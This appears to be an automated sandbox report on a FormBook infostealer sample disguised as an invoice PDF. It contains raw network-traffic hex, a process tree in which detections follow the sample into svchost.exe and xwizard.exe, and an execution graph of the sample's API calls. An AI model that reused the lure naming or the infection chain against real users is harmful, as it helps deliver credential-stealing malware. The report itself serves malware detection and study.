                                                                            Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv)*trnx71feFg4<`:yvN`:PK}nZ3s@~pcaan8P*|o?W.sp_3Zfge-C}{77A::3g;7V|c173>7|f9+xoxy!HUY"_~iksuvm>5McT+|Xda1[9,\{rdLDAz:*&$?Nu1h+087YSD0f<[Fi53:?3}{9>0}3bV0`-U6`tnQL7)EDpA,lnqsN/[$eP`>Bw,z@pnRTlX;9a pn6ADY;@3%0kL'~pw Wo]Ym*kKq-D2}E%kd6AK\-\`9;!;jU/$8X<K*[IGLU2^>MNH_7&bW1((K3e]<cRDFxZYnWh|Z"r`zc)<8 [TRUNCATED]
                                                                            Dec 10, 2024 16:27:07.551563025 CET1236INData Raw: 64 9b d6 78 02 a9 6d 27 53 8d 46 ad 6b 4c 3a 99 a4 43 df 63 e0 07 06 98 29 61 13 47 c2 1e 13 55 63 f8 89 d8 44 d3 5b 7a f8 6a 42 22 1b e4 07 b1 c5 6c 30 77 07 84 2b 03 04 4f 05 7e 17 e1 31 f8 d8 0c 89 6d ba ce 40 54 29 e8 c6 e4 b2 41 2d 12 99 0c
                                                                            Data Ascii: dxm'SFkL:Cc)aGUcD[zjB"l0w+O~1m@T)A-IPcfJKpPJ%kMj)dB3u=Y(!0?9s=xYXRcD]=az2rb(o=k,R~=t`;WswH=F%@s
                                                                            Dec 10, 2024 16:27:07.551574945 CET448INData Raw: e5 61 1b ea 6c 72 6a 7d e7 6d 72 51 90 64 26 a3 dc be f9 24 0c 72 bb 64 03 ea 6e 63 bc ac d6 fe 86 78 86 15 4f 6e 84 47 d8 9f d7 00 6f d8 0f 51 d3 0f 68 78 67 f8 f0 d4 46 b7 7d dc ed d9 6c 86 6e c3 3e 08 1b 7e 38 43 3b c3 84 a7 37 b2 23 f4 cf 6c
                                                                            Data Ascii: alrj}mrQd&$rdncxOnGoQhxgF}ln>~8C;7#l`74xz:uHPC:g0#m@753xz9FsHC97b G%q+b{fYi}HXCrIx8YQk_27{deG)[
                                                                            Dec 10, 2024 16:27:07.551759005 CET1236INData Raw: 91 52 5a 3f 4b ae 6c 28 43 ed ba b2 70 8e 66 8a af b2 74 86 70 79 a1 98 43 76 c2 a1 98 e9 39 86 fd 90 4a 2d 64 ad 8c 1b 73 b2 f1 ec 5e 17 53 d4 4e c8 ef 33 ff f6 e6 f5 c7 95 3d 8d 12 ce 6e 82 c5 60 c4 7d 2d 7f 07 0f 3a f0 c0 f1 f5 57 98 c1 76 72
                                                                            Data Ascii: RZ?Kl(CpftpyCv9J-ds^SN3=n`}-:WvrvvwwI `WyJB~*whmm\d#Y##Ai[%id$8|HD~uFc+OgQisU.8c<_#_iarYnS
                                                                            Dec 10, 2024 16:27:07.551784039 CET1236INData Raw: 9e cd a4 df 6d ca b1 99 f4 99 c4 42 6d b3 e1 17 ac e9 4c de f7 67 b4 ea 93 cc a9 07 b4 ec 4b 89 7b 46 eb 9e 89 48 36 0b 3f 4f da 33 59 f9 4c 14 35 b3 f4 4b 29 7b 72 6b bf 92 30 76 8b 9f 89 37 4c 56 7f 9e 25 cf 6b f9 97 b6 e6 d9 ac 7f 26 2e 33 5a
                                                                            Data Ascii: mBmLgK{FH6?O3YL5K){rk0v7LV%k&.3Zy`'PNyl#(\^Az.w'?pMRY{<PgLE6:/("O_8PJn9'6_(6xSJ[/){@i{A
                                                                            Dec 10, 2024 16:27:07.552292109 CET448INData Raw: 61 90 94 96 b9 82 3e 5a 3d d8 66 00 b6 13 01 43 5f 03 4a 56 41 da 2d c6 54 ab a8 14 e6 01 be 22 37 fd 6e dc 56 6f 0a 4e 60 1b 2b 77 e3 90 37 77 c6 c8 cc f4 eb 82 c6 ad 97 87 4b d5 60 fa ed ca 80 05 3a ad 9c 0b e9 18 04 0d f5 6d 2b 9b 2a b5 6d 6a
                                                                            Data Ascii: a>Z=fC_JVA-T"7nVoN`+w7wK`:m+*mj)3}fl2Cde7Z,S|TRkPh[-W11S2\+_YxinvJE.rL33B*YMb ZZ9U'z'QNC_!i%/
                                                                            Dec 10, 2024 16:27:07.552304029 CET1236INData Raw: ae d5 e1 fb 92 c3 95 0b 2e ff 80 48 71 6e 1a 49 2d 2f 32 ef 41 2f 02 1d 00 17 56 2e f4 76 fe b5 b3 a9 d5 e2 6c cc 36 bc 20 21 d5 c8 e8 c2 d9 24 37 9e 48 28 b9 ed 19 db 4f a0 bd cd 16 c2 4b bb b3 ce 6f df b5 0c be 1f 40 f6 05 b2 3d 1b 5c e8 1b a2
                                                                            Data Ascii: .HqnI-/2A/V.vl6 !$7H(OKo@=\T`j91sokan-P-LKesTX2QR(s2 Lv?$nF#R9Z)6wc>z.pwfY0Uq`%>*:-pY
                                                                            Dec 10, 2024 16:27:07.552323103 CET224INData Raw: ac b5 63 c5 10 ae ab 29 8d ab 36 e3 6d 5c ad 92 c3 86 6c cc 67 c2 6e bc d5 7c 1e a9 63 d9 98 35 6f f9 4e 6e c7 35 6b 79 5e c1 b8 ec 8b 58 e8 2b 56 a6 c5 da e1 1b 5a 4a aa b2 31 9a 96 ad e4 ae 39 32 af 17 45 81 28 c7 10 51 39 a9 43 95 f0 a2 12 69
                                                                            Data Ascii: c)6m\lgn|c5oNn5ky^X+VZJ192E(Q9CiMaBYFUU/O>&!2aV~Ey6^|TZRI&LcQbYC!k<"k@JkWgEC<vo8*c$~t,Pe5PDhe2)
                                                                            Dec 10, 2024 16:27:07.552331924 CET1236INData Raw: 47 cd 3f c4 bc b0 5d 30 03 16 41 b6 0d 30 87 dc 98 13 34 c8 0d 6f 70 83 09 69 4c 27 e8 8d 85 b9 79 c3 79 37 d7 46 4f 52 55 2e fa c7 8b 7d 2e 1c 08 fd 1d 0a 63 47 13 f6 54 5f c7 25 8c 8c cc 4a c2 6a a7 d7 0a ed 10 67 cf 29 d3 bb 86 2c cb 45 c3 2b
                                                                            Data Ascii: G?]0A04opiL'yy7FORU.}.cGT_%Jjg),E+8FL1U,H5[l5jY_5F9Z3TSP4X5zViy6p8\X7QU36sxGRJJY24d%dETS('OXKtR+E|
                                                                            Dec 10, 2024 16:27:07.552869081 CET224INData Raw: 3c e0 65 00 af ca 23 bc 10 45 5e 1b aa f8 c2 32 28 a6 00 38 65 34 0c af f1 73 34 42 d8 22 3f 14 a4 01 3c d3 46 e4 ee 58 1a 24 45 c6 d2 72 a0 0d 79 45 90 66 a0 87 64 09 6a 0c a0 86 a2 8e 06 2a 94 51 a2 1f f8 35 52 0c fc 1a 0e 3b e1 97 d0 11 c4 31
                                                                            Data Ascii: <e#E^2(8e4s4B"?<FX$EryEfdj*Q5R;12K{_KWg9N\: jPcX59+*Y?x$m<4(IIGr4ZWGW^v<L!g^gEQrVU
                                                                            Dec 10, 2024 16:27:07.671237946 CET1236INData Raw: ac 24 92 9b ca 20 29 a0 00 5b a1 e5 23 e4 aa a8 52 a6 8a ea 40 01 89 08 2f 45 94 1b e0 21 f0 59 06 c2 64 6c f5 18 04 40 05 46 8c 89 f0 8c 04 39 cd d1 77 f2 3b ed dd f7 45 8e ca 28 3d c3 ce 68 04 cd 9a 0d 80 02 99 f4 16 f0 55 54 00 c5 00 ba 68 08
                                                                            Data Ascii: $ )[#R@/E!Ydl@F9w;E(=hUThT%DlQ@@(d$[`yuy<C0f V3A0N)hP)C QPYFn#z"a* @0`p6CZZP;\'nah<0RqFym


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:10:22:57
                                                                            Start date:10/12/2024
                                                                            Path:C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                                                                            Imagebase:0x400000
                                                                            File size:983'498 bytes
                                                                            MD5 hash:809F3ED91D34D38F0ECED2A0709E22E9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:10:22:58
                                                                            Start date:10/12/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                                                                            Imagebase:0x670000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:10:23:22
                                                                            Start date:10/12/2024
                                                                            Path:C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe"
                                                                            Imagebase:0x420000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:5
                                                                            Start time:10:23:24
                                                                            Start date:10/12/2024
                                                                            Path:C:\Windows\SysWOW64\xwizard.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\xwizard.exe"
                                                                            Imagebase:0x460000
                                                                            File size:55'808 bytes
                                                                            MD5 hash:8581F29C5F84B72C053DBCC5372C5DB6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:10:23:48
                                                                            Start date:10/12/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff79f9e0000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:3.3%
                                                                              Dynamic/Decrypted Code Coverage:1.1%
                                                                              Signature Coverage:3.7%
                                                                              Total number of Nodes:1694
                                                                              Total number of Limit Nodes:44
                                                                              execution_graph 84769 467046 84770 46705d 84769->84770 84780 467136 84769->84780 84771 4671a0 84770->84771 84772 46710d 84770->84772 84773 467199 84770->84773 84782 46706e 84770->84782 84775 41171a 75 API calls 84771->84775 84776 41171a 75 API calls 84772->84776 84803 40e380 VariantClear ctype 84773->84803 84788 4670f3 _realloc 84775->84788 84776->84788 84777 4670d2 84789 41171a 84777->84789 84778 41171a 75 API calls 84778->84780 84784 41171a 75 API calls 84782->84784 84787 4670a9 ctype 84782->84787 84784->84787 84785 4670e8 84802 45efe7 77 API calls ctype 84785->84802 84787->84771 84787->84777 84787->84788 84788->84778 84790 411724 84789->84790 84792 41173e 84790->84792 84796 411740 std::bad_alloc::bad_alloc 84790->84796 84804 4138ba 84790->84804 84822 411afc 6 API calls __decode_pointer 84790->84822 84801 443466 75 API calls 84792->84801 84794 411766 84826 4116fd 67 API calls std::exception::exception 84794->84826 84796->84794 84823 411421 84796->84823 84797 411770 84827 41805b RaiseException 84797->84827 84800 41177e 84801->84785 84802->84788 84803->84771 84805 41396d 84804->84805 84815 4138cc 84804->84815 84835 411afc 6 API calls __decode_pointer 84805->84835 84807 413973 84836 417f23 67 API calls __getptd_noexit 84807->84836 84812 413929 RtlAllocateHeap 84812->84815 84813 4138dd 84813->84815 84828 418252 67 API calls 2 library calls 84813->84828 84829 4180a7 67 API calls 7 library calls 84813->84829 84830 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84813->84830 84815->84812 84815->84813 84816 413959 84815->84816 84819 41395e 84815->84819 84821 413965 84815->84821 84831 41386b 67 API calls 4 library calls 84815->84831 84832 411afc 6 API calls __decode_pointer 84815->84832 84833 417f23 67 API calls __getptd_noexit 84816->84833 84834 417f23 67 API calls __getptd_noexit 84819->84834 84821->84790 84822->84790 84837 4113e5 84823->84837 84825 41142e 84825->84794 84826->84797 84827->84800 84828->84813 84829->84813 84831->84815 84832->84815 84833->84819 84834->84821 84835->84807 84836->84821 84838 4113f1 __setmode 84837->84838 84845 41181b 84838->84845 84844 411412 __setmode 84844->84825 84871 418407 84845->84871 84847 4113f6 84848 4112fa 84847->84848 84936 4169e9 TlsGetValue 84848->84936 84851 4169e9 __decode_pointer 6 API calls 84852 41131e 84851->84852 84853 4113a1 84852->84853 84946 4170e7 68 API calls 4 library calls 84852->84946 84868 41141b 84853->84868 84855 41133c 84856 411388 84855->84856 84858 411357 84855->84858 84859 411366 84855->84859 84857 41696e __encode_pointer 6 API calls 84856->84857 84860 411396 84857->84860 84947 417047 73 API calls _realloc 84858->84947 84859->84853 84863 411360 84859->84863 84861 41696e __encode_pointer 6 API calls 84860->84861 84861->84853 84863->84859 84865 41137c 84863->84865 84948 417047 73 API calls _realloc 84863->84948 84949 41696e TlsGetValue 84865->84949 84866 411376 84866->84853 84866->84865 84961 411824 84868->84961 84872 41841c 84871->84872 84873 41842f EnterCriticalSection 84871->84873 84878 418344 84872->84878 84873->84847 84875 418422 84875->84873 84906 4117af 67 API calls 3 library calls 84875->84906 84877 41842e 84877->84873 84879 418350 __setmode 84878->84879 84880 418360 84879->84880 84881 418378 84879->84881 84907 418252 67 API calls 2 library calls 84880->84907 84889 418386 __setmode 84881->84889 84910 416fb6 84881->84910 84884 418365 84908 4180a7 67 API calls 7 library calls 84884->84908 84887 4183a7 84892 418407 __lock 67 API calls 84887->84892 84888 418398 84916 417f23 67 API calls __getptd_noexit 84888->84916 84889->84875 84890 41836c 84909 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84890->84909 84894 4183ae 84892->84894 84896 4183e2 84894->84896 84897 4183b6 84894->84897 84898 413a88 __read_nolock 67 API calls 84896->84898 84917 4189e6 InitializeCriticalSectionAndSpinCount __setmode 84897->84917 84900 4183d3 84898->84900 84932 4183fe LeaveCriticalSection _doexit 84900->84932 84901 4183c1 84901->84900 84918 413a88 84901->84918 84904 4183cd 84931 417f23 67 API calls __getptd_noexit 84904->84931 84906->84877 84907->84884 84908->84890 84913 416fbf 84910->84913 84911 4138ba _malloc 66 API calls 84911->84913 84912 416ff5 84912->84887 84912->84888 84913->84911 84913->84912 84914 416fd6 Sleep 84913->84914 84915 416feb 84914->84915 84915->84912 84915->84913 84916->84889 84917->84901 84920 413a94 __setmode 84918->84920 84919 413b0d _realloc __setmode 84919->84904 84920->84919 84921 413ad3 84920->84921 84923 418407 __lock 65 API calls 84920->84923 84921->84919 84922 413ae8 RtlFreeHeap 84921->84922 84922->84919 84924 413afa 84922->84924 84927 413aab ___sbh_find_block 84923->84927 84935 417f23 67 API calls __getptd_noexit 84924->84935 84926 413aff GetLastError 84926->84919 84930 413ac5 84927->84930 84933 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __fptostr 84927->84933 84934 413ade LeaveCriticalSection _doexit 84930->84934 84931->84900 84932->84889 84933->84930 84934->84921 84935->84926 84937 416a01 84936->84937 84938 416a22 GetModuleHandleW 84936->84938 84937->84938 84939 416a0b TlsGetValue 84937->84939 84940 416a32 84938->84940 84941 416a3d GetProcAddress 84938->84941 84944 416a16 84939->84944 84959 41177f Sleep GetModuleHandleW 84940->84959 84943 41130e 84941->84943 84943->84851 84944->84938 84944->84943 84945 416a38 84945->84941 84945->84943 84946->84855 84947->84863 84948->84866 84950 4169a7 GetModuleHandleW 84949->84950 84951 416986 84949->84951 84953 4169c2 GetProcAddress 84950->84953 84954 4169b7 84950->84954 84951->84950 84952 416990 TlsGetValue 84951->84952 84957 41699b 84952->84957 84956 41699f 84953->84956 84960 41177f Sleep GetModuleHandleW 84954->84960 84956->84856 84957->84950 84957->84956 84958 4169bd 84958->84953 84958->84956 84959->84945 84960->84958 84964 41832d LeaveCriticalSection 84961->84964 84963 411420 84963->84844 84964->84963 86063 429212 86068 410b90 86063->86068 86066 411421 __cinit 74 API calls 86067 42922f 86066->86067 86069 410b9a __write_nolock 86068->86069 86070 41171a 75 API calls 86069->86070 86071 410c31 GetModuleFileNameW 86070->86071 86072 413db0 __wsplitpath 67 API calls 86071->86072 86073 410c66 _wcsncat 86072->86073 86085 413e3c 86073->86085 86076 41171a 75 API calls 86077 410ca3 _wcscpy 86076->86077 86078 410cd1 RegOpenKeyExW 86077->86078 86079 429bc3 RegQueryValueExW 86078->86079 86080 410cf7 86078->86080 86081 429cd9 RegCloseKey 86079->86081 86083 429bf2 _wcscat _wcslen _wcsncpy 86079->86083 86080->86066 86082 41171a 75 API calls 86082->86083 86083->86082 86084 429cd8 86083->86084 86084->86081 86088 41abec 86085->86088 86089 41ac02 86088->86089 86090 41abfd 86088->86090 86097 417f23 67 API calls __getptd_noexit 86089->86097 86090->86089 86096 41ac22 86090->86096 86092 41ac07 86098 417ebb 6 API calls 2 library calls 86092->86098 86095 410c99 86095->86076 86096->86095 86099 417f23 67 API calls __getptd_noexit 86096->86099 86097->86092 86099->86092 86100 4034b0 86101 4034b9 86100->86101 86102 4034bd 86100->86102 86103 41171a 75 API calls 86102->86103 86104 42a0ba 86102->86104 86105 4034fe _realloc ctype 86103->86105 86106 40f110 RegOpenKeyExW 86107 40f13c RegQueryValueExW RegCloseKey 86106->86107 86108 40f15f 86106->86108 86107->86108 86109 416193 86146 41718c 86109->86146 86111 41619f GetStartupInfoW 86113 4161c2 86111->86113 86147 41aa31 HeapCreate 86113->86147 86118 416212 86149 416e29 GetModuleHandleW 86118->86149 86119 416223 __RTC_Initialize 86183 41b669 86119->86183 86122 416231 86123 41623d GetCommandLineW 86122->86123 86252 4117af 67 API calls 3 library calls 86122->86252 86198 42235f GetEnvironmentStringsW 86123->86198 86126 41624c 86204 4222b1 GetModuleFileNameW 86126->86204 86127 41623c 86127->86123 86129 416256 86130 416261 86129->86130 86253 4117af 67 API calls 3 library calls 86129->86253 86208 422082 86130->86208 86134 416272 86221 41186e 86134->86221 86137 416279 86139 416284 __wwincmdln 86137->86139 86255 4117af 67 API calls 3 library calls 86137->86255 86227 40d7f0 86139->86227 86142 4162b3 86257 411a4b 67 API calls _doexit 86142->86257 86145 4162b8 __setmode 86146->86111 86148 416206 86147->86148 86148->86118 86250 41616a 67 API calls 3 library calls 86148->86250 86150 416e44 86149->86150 86151 416e3d 86149->86151 86152 416fac 86150->86152 86153 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86150->86153 86258 41177f Sleep GetModuleHandleW 86151->86258 86262 416ad5 70 API calls 2 library calls 86152->86262 86155 416e97 TlsAlloc 86153->86155 86159 416218 86155->86159 86160 416ee5 TlsSetValue 86155->86160 86157 416e43 86157->86150 86159->86119 86251 41616a 67 API calls 3 library calls 86159->86251 86160->86159 86161 416ef6 86160->86161 86259 411a69 6 API calls 4 library calls 86161->86259 86163 416efb 86164 41696e __encode_pointer 6 API calls 86163->86164 86165 416f06 86164->86165 86166 41696e __encode_pointer 6 API calls 86165->86166 86167 416f16 86166->86167 86168 41696e __encode_pointer 6 API calls 86167->86168 86169 416f26 86168->86169 86170 41696e __encode_pointer 6 API calls 86169->86170 86171 416f36 86170->86171 86260 41828b InitializeCriticalSectionAndSpinCount __mtinitlocknum 86171->86260 86173 416f43 86173->86152 86174 4169e9 __decode_pointer 6 API calls 86173->86174 86175 416f57 86174->86175 86175->86152 86176 416ffb __calloc_crt 67 API calls 86175->86176 86177 416f70 86176->86177 86177->86152 86178 4169e9 __decode_pointer 6 API calls 86177->86178 86179 416f8a 86178->86179 86179->86152 86180 416f91 86179->86180 86261 416b12 67 API calls 5 library calls 86180->86261 86182 416f99 GetCurrentThreadId 86182->86159 86263 41718c 86183->86263 86185 41b675 GetStartupInfoA 86186 416ffb __calloc_crt 67 API calls 86185->86186 86193 41b696 86186->86193 86187 41b8b4 __setmode 86187->86122 86188 41b831 GetStdHandle 86192 41b7fb 86188->86192 86189 416ffb __calloc_crt 67 API calls 86189->86193 86190 41b896 SetHandleCount 86190->86187 86191 41b843 GetFileType 86191->86192 86192->86187 86192->86188 86192->86190 86192->86191 86265 4189e6 InitializeCriticalSectionAndSpinCount __setmode 86192->86265 86193->86187 86193->86189 86193->86192 86194 41b77e 86193->86194 86194->86187 86194->86192 86195 41b7a7 GetFileType 86194->86195 86264 4189e6 InitializeCriticalSectionAndSpinCount __setmode 86194->86264 86195->86194 86199 422370 86198->86199 86200 422374 86198->86200 86199->86126 86201 416fb6 __malloc_crt 67 API calls 86200->86201 86202 422395 _realloc 86201->86202 86203 42239c FreeEnvironmentStringsW 86202->86203 86203->86126 86205 4222e6 _wparse_cmdline 86204->86205 86206 416fb6 __malloc_crt 67 API calls 86205->86206 86207 422329 _wparse_cmdline 86205->86207 86206->86207 86207->86129 86210 42209a _wcslen 86208->86210 86213 416267 86208->86213 86209 416ffb __calloc_crt 67 API calls 86218 4220be _wcslen 86209->86218 86210->86209 86211 422123 86212 413a88 __read_nolock 67 API calls 86211->86212 86212->86213 86213->86134 86254 4117af 67 API calls 3 library calls 86213->86254 86214 416ffb __calloc_crt 67 API calls 86214->86218 86215 422149 86216 413a88 __read_nolock 67 API calls 86215->86216 86216->86213 86218->86211 86218->86213 86218->86214 86218->86215 86219 422108 86218->86219 86266 426349 67 API calls __setmode 86218->86266 86219->86218 86267 417d93 10 API calls 3 library calls 86219->86267 86222 41187c __IsNonwritableInCurrentImage 86221->86222 86268 418486 86222->86268 86224 41189a __initterm_e 86225 411421 __cinit 74 API calls 86224->86225 86226 4118b9 __IsNonwritableInCurrentImage __initterm 86224->86226 86225->86226 86226->86137 86228 431bcb 86227->86228 86229 40d80c 86227->86229 86230 4092c0 VariantClear 86229->86230 86231 40d847 86230->86231 86272 40eb50 86231->86272 86234 40d877 86275 411ac6 67 API calls 4 library calls 86234->86275 86237 40d888 86276 411b24 67 API calls __setmode 86237->86276 86239 40d891 86277 40f370 SystemParametersInfoW SystemParametersInfoW 86239->86277 86241 40d89f 86278 40d6d0 GetCurrentDirectoryW 86241->86278 86243 40d8a7 SystemParametersInfoW 86244 40d8d4 86243->86244 86245 40d8cd FreeLibrary 86243->86245 86246 4092c0 VariantClear 86244->86246 86245->86244 86247 40d8dd 86246->86247 86248 4092c0 VariantClear 86247->86248 86249 40d8e6 86248->86249 86249->86142 86256 411a1f 67 API calls _doexit 86249->86256 86250->86118 86251->86119 86252->86127 86253->86130 86254->86134 86255->86139 86256->86142 86257->86145 86258->86157 86259->86163 86260->86173 86261->86182 86262->86159 86263->86185 86264->86194 86265->86192 86266->86218 86267->86219 86269 41848c 86268->86269 86270 41696e __encode_pointer 6 API calls 86269->86270 86271 4184a4 86269->86271 86270->86269 86271->86224 86316 40eb70 86272->86316 86275->86237 86276->86239 86277->86241 86320 401f80 86278->86320 86280 40d6f1 IsDebuggerPresent 86281 431a9d MessageBoxA 86280->86281 86282 40d6ff 86280->86282 86283 431ab6 86281->86283 86282->86283 86284 40d71f 86282->86284 86422 403e90 75 API calls 3 library calls 86283->86422 86390 40f3b0 86284->86390 86288 40d73a GetFullPathNameW 86420 401440 127 API calls _wcscat 86288->86420 86290 40d77a 86291 40d782 86290->86291 86292 431b09 SetCurrentDirectoryW 86290->86292 86293 40d78b 86291->86293 86423 43604b 6 API calls 86291->86423 86292->86291 86402 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86293->86402 86296 431b28 86296->86293 86298 431b30 GetModuleFileNameW 86296->86298 86301 431ba4 GetForegroundWindow ShellExecuteW 86298->86301 86302 431b4c 86298->86302 86300 40d795 86310 40d7a8 86300->86310 86410 40e1e0 86300->86410 86303 40d7c7 86301->86303 86424 401b70 86302->86424 86308 40d7d1 SetCurrentDirectoryW 86303->86308 86308->86243 86309 431b66 86431 40d3b0 75 API calls 2 library calls 86309->86431 86310->86303 86421 401000 Shell_NotifyIconW _memset 86310->86421 86313 431b72 GetForegroundWindow ShellExecuteW 86314 431b9f 86313->86314 86314->86303 86315 40eba0 LoadLibraryA GetProcAddress 86315->86234 86317 40d86e 86316->86317 86318 40eb76 LoadLibraryA 86316->86318 86317->86234 86317->86315 86318->86317 86319 40eb87 GetProcAddress 86318->86319 86319->86317 86432 40e680 86320->86432 86324 401fa2 GetModuleFileNameW 86450 40ff90 86324->86450 86326 401fbd 86462 4107b0 86326->86462 86329 401b70 75 API calls 86330 401fe4 86329->86330 86465 4019e0 86330->86465 86332 401ff2 86333 4092c0 VariantClear 86332->86333 86334 402002 86333->86334 86335 401b70 75 API calls 86334->86335 86336 40201c 86335->86336 86337 4019e0 76 API calls 86336->86337 86338 40202c 86337->86338 86339 401b70 75 API calls 86338->86339 86340 40203c 86339->86340 86473 40c3e0 86340->86473 86342 40204d 86491 40c060 86342->86491 86346 40206e 86503 4115d0 86346->86503 86349 42c174 86352 401a70 75 API calls 86349->86352 86350 402088 86351 4115d0 __wcsicoll 79 API calls 86350->86351 86354 402093 86351->86354 86353 42c189 86352->86353 86356 401a70 75 API calls 86353->86356 86354->86353 86355 40209e 86354->86355 86357 4115d0 __wcsicoll 79 API calls 86355->86357 86358 42c1a7 86356->86358 86359 4020a9 86357->86359 86360 42c1b0 GetModuleFileNameW 86358->86360 86359->86360 86361 4020b4 86359->86361 86363 401a70 75 API calls 86360->86363 86362 4115d0 __wcsicoll 79 API calls 86361->86362 86364 4020bf 86362->86364 86365 42c1e2 86363->86365 86366 402107 86364->86366 86369 42c20a _wcscpy 86364->86369 86372 401a70 75 API calls 86364->86372 86515 40df50 86365->86515 86368 402119 86366->86368 86366->86369 86371 42c243 86368->86371 86511 40e7e0 76 API calls 86368->86511 86377 401a70 75 API calls 86369->86377 86375 4020e5 _wcscpy 86372->86375 86373 401a70 75 API calls 86376 42c201 86373->86376 86381 401a70 75 API calls 86375->86381 86376->86369 86385 402148 86377->86385 86378 402132 86512 40d030 76 API calls 86378->86512 86380 40213e 86382 4092c0 VariantClear 86380->86382 86381->86366 86382->86385 86383 402184 86387 4092c0 VariantClear 86383->86387 86385->86383 86388 401a70 75 API calls 86385->86388 86513 40d030 76 API calls 86385->86513 86514 40e640 76 API calls 86385->86514 86389 402196 ctype 86387->86389 86388->86385 86389->86280 86391 42ccf4 _memset 86390->86391 86392 40f3c9 86390->86392 86394 42cd05 GetOpenFileNameW 86391->86394 86603 40ffb0 76 API calls ctype 86392->86603 86394->86392 86396 40d732 86394->86396 86395 40f3d2 86604 410130 SHGetMalloc 86395->86604 86396->86288 86396->86290 86398 40f3d9 86609 410020 88 API calls __wcsicoll 86398->86609 86400 40f3e7 86610 40f400 86400->86610 86403 42b9d3 86402->86403 86404 41025a LoadImageW RegisterClassExW 86402->86404 86662 443e8f EnumResourceNamesW LoadImageW 86403->86662 86661 4102f0 7 API calls 86404->86661 86407 40d790 86409 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86407->86409 86408 42b9da 86409->86300 86412 40e207 _memset 86410->86412 86411 40e262 86414 40e2a4 86411->86414 86685 43737d 84 API calls __wcsicoll 86411->86685 86412->86411 86413 42aa14 DestroyIcon 86412->86413 86413->86411 86416 40e2c0 Shell_NotifyIconW 86414->86416 86417 42aa50 Shell_NotifyIconW 86414->86417 86663 401be0 86416->86663 86419 40e2da 86419->86310 86420->86290 86421->86303 86422->86290 86423->86296 86425 401b76 _wcslen 86424->86425 86426 41171a 75 API calls 86425->86426 86428 401bc5 86425->86428 86427 401bad _realloc 86426->86427 86429 41171a 75 API calls 86427->86429 86430 40d3b0 75 API calls 2 library calls 86428->86430 86429->86428 